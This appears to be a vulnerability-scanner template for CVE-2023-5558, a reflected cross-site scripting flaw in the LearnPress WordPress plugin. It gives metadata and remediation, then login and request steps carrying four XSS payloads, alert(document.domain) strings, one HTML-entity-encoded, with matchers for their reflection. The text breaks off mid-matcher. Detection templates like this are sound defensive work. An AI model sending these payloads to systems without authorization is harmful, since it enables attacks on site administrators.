id: CVE-2023-5558 info: name: LearnPress < 4.2.5.5 - Cross-Site Scripting author: ritikchaddha severity: medium description: | The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. impact: | Allows attackers to execute malicious scripts in the context of the victim's browser. remediation: | Update LearnPress WordPress Plugin to the latest version to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/4efd2a4d-89bd-472f-ba5a-f9944fd4dd16/ - https://nvd.nist.gov/vuln/detail/CVE-2023-5558 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-5558 cwe-id: CWE-79 epss-score: 0.00046 epss-percentile: 0.15636 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 6 vendor: thimpress product: learnpress framework: wordpress tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,xss,authenticated flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: word words: - "/wp-content/plugins/learnpress" internal: true - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /{{path}} HTTP/1.1 Host: {{Hostname}} payloads: path: - '?param=value%22%27%3Balert(document.domain)%3C!--' - '?param=value%22%27%3Balert(document.domain)%3Bb=%27' - '?%27-alert(%60XSS%60)-%27=a' - 'instructors/?param=value%26%23x3C%3B%2Fscript%26%23x3E%3B%26%23x3C%3Bscript%26%23x3E%3Balert%26%23x60%3Bdocument.domain%26%23x60%3B%26%23x3C%3B%2Fscript%26%23x3E%3B%0A' matchers-condition: and matchers: - type: word part: body words: - "\"';alert(document.domain)